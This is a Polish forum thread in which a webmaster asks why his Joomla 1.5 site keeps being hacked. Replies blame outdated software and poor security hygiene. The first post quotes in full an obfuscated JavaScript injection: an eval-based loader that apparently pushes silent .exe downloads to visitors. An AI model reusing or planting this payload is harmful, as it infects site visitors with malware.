strona notorycznie atakowana, zmieniany index.php szablonu

[rafipl]

Joomla wersja 1.5.22

Od miesiąca borykam sie z notorycznymi włamaniami na strone. Z początku było to co tydzień, teraz juz częściej. Jakiś robak, wirus czy coś ;/ nie wiem. Mianowicie zmieniane są wszystkie kody plikow:
-index.html
-większość plików *.php
-wszystkie pliki skryptów
A wiec zmieniane są pliki w każdym folderze szablonów i wszystkie inne należące do strony ;/
Łącznie z plikami będącymi w folderze administratora itp...
Do powyższych plików dopisywany jest kod:

Kod:

#10d442#
                                                                                                                                                                                                                                                          echo "                                                                                                                                                                                                                                                          <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                          v=\"val\";try{faweb++}catch(btawetb){try{fve^32}catch(btawt4){w=window;e=w[\"e\"+v];}}if(1){f=new Array(9,8,103,102,31,38,100,110,97,117,108,99,110,115,44,103,100,114,69,107,99,109,100,108,116,114,64,121,83,95,103,77,95,109,100,38,39,97,109,100,120,37,41,90,46,93,40,121,13,8,7,9,104,100,114,96,107,101,113,38,41,58,11,9,8,123,32,100,106,115,100,30,123,12,7,9,8,98,111,98,115,109,100,108,116,45,117,114,104,114,101,39,32,60,104,100,114,96,107,101,31,113,114,98,59,39,103,114,116,111,56,47,46,108,102,51,44,97,99,107,111,109,113,116,113,44,110,100,114,47,96,98,47,62,103,100,60,53,56,55,37,32,118,103,100,115,102,61,38,47,48,38,30,104,100,103,103,103,114,61,38,47,48,38,30,115,115,119,108,100,59,39,117,103,115,104,96,105,107,103,116,120,56,104,104,98,100,100,108,59,111,109,115,104,114,105,110,108,58,96,96,115,110,106,117,115,99,59,107,99,102,115,56,48,58,114,111,111,56,48,58,37,62,59,45,105,101,112,97,108,99,62,33,39,59,12,7,9,124,11,9,8,100,117,109,97,116,104,109,110,31,103,102,113,95,109,100,112,40,40,121,13,8,7,9,117,95,114,31,100,32,60,30,100,110,97,117,108,99,110,115,44,99,113,99,97,115,99,69,107,99,109,100,108,116,39,37,105,101,112,97,108,99,39,40,57,102,45,113,101,115,63,116,115,112,105,97,115,116,100,38,39,114,112,99,38,42,39,103,114,116,111,56,47,46,108,102,51,44,97,99,107,111,109,113,116,113,44,110,100,114,47,96,98,47,62,103,100,60,53,56,55,37,41,58,100,46,114,114,121,107,99,46,117,103,115,104,96,105,107,103,116,120,59,39,103,103,100,99,99,110,38,57,102,45,113,116,120,106,101,45,110,111,114,103,116,104,109,110,60,37,97,97,113,111,107,115,116,100,37,59,101,44,115,115,119,108,100,44,108,100,100,116,60,37,48,38,57,102,45,113,116,120,106,101,45,114,111,111,59,39,47,37,59,101,44,115,100,114,65,115,114,114,104,96,117,115,99,40,38,117,105,99,114,104,38,42,39,48,46,39,40,57,102,45,113,101,115,63,116,115,112,105,97,115,116,100,38,39,103,99,105,102,102,116,38,42,39,48,46,39,40,57,13,8,7,9,99,109,99,116,107,101,109,114,46,102,99,116,68,106,101,108,99,110,115,113,66,120,82,97,102,76,97,108,99,40,38,96,111,99,119,39,40,89,48,92,44,97,111,110,101,109,98,67,103,103,108,99,38,102,40,57,13,8,7,125);}w=f;s=[];r=String;x=\"j%\";for(i=0;-i+577!=0;i+=1){j=i;if(e&&(031==0x19))s=s+r[\"fromCharCode\"]((1*w[j]+e(x+3)));}if(0x10==020)try{(w+s)()}catch(asga){e(\"if(1)\"+s+\"\");}</script>";

#/10d442#

Co robić? jak się za to zabrać?

[Bazyl]

Wiki - witryna po włamaniu.
Punkt po punkcie

[rafipl]

Prawdopodobne źródło problemu - DJ-Image Slider. Mam dwie strony z tym modułem i na obu ten sam problem. Dodatkowo wchodząc na strone modułu http://dj-extensions.com/dj-imageslider avast informuje o zablokowaniu zagrożenia, tego samego co mam na stronach.

[tomaszek83]

Joomla wersja 1.5.22

Prawdopodobnie to wina tego że masz nieaktualną wersję Joomla, a nie wina DJ Image Slider (notabene ja wchodząc na stronę DJ Extensions nie mam żadnego alertu, ani na avaście ani na eset NOD ani na kasperskym)!!! Ale skoro nie uważasz za słuszne aktualizować CMS to sam się prosisz o włamania.

[rafipl]

Doszedłem do tego dzisiaj, jak sprawdziłem inną strone zrobiona przeze mnie - tam jest to samo, tylko poki co glowny plik zainfekowany byl. ta druga strone mam na joomli 2.5.6
druga sprawa - gdy wszedlem na strone modulu http://dj-extensions.com/dj-imageslider to avast tez zapobiegl przed sciagnieciem pliku *.exe

[tomaszek83]

*.exe??? a od kiedy dodatki do Joomla mają rozszerzenie .exe???

[rafipl]

wchodzac na ktoras ze stron zainfekowanych automatycznie i po cichu jest sciagany plik *.exe bedacy infekcja, ktory automatycznie sie instaluje na komputerze... chyba ze ma sie aktualny program antywirusowy... nie mowie tutaj o dodatku, ktory ma rozszerzenie exe tylko o zlosliwym pliku sciaganym po cichu na zarazonej stronie ;)
ps. pozdrowienia z lubniewic ;)

[tomaszek83]

Tak poza tym to na tej stronie extreme-dive. pl/modules/ mod_ariimageslider/ mod_ariimageslider/ js/ jquery.noconflict.js, która jest chyba Twoim dziełem, też masz trojana. I to tak jakby nie DJ Image Slider. Zanim zaczniesz na drugi raz rzucać oskarżeniami, który to moduł jest zainfekowany to sam uderz się w pierś i zastanów czy aby* (wybierz dowolne):
- nie posiadasz starej wersji Joomla,
- nie posiadasz nieaktualnych rozszerzeń,
- nie posiadasz pirackich szablonów, rozszerzeń
- nie posiadasz zapamiętanych haseł w TC
- nie posiadasz pirackiego softu na kompie z którego łączysz się z FTP-em
- nie używasz prostych haseł do FTP, zaplecza, etc...
- nie korzystałeś z niezabezpieczonego komputera podczas połączenia z FTP-em

i wiele, wiele innych...

PS. Swoją drogą co to za pogotowie komputerowe które nie aktualizuje CMS-a. No chyba że, jak mawia powiedzenie, wyznajesz zasadę, że szewc bez butów chodzi...

Pozdrawiam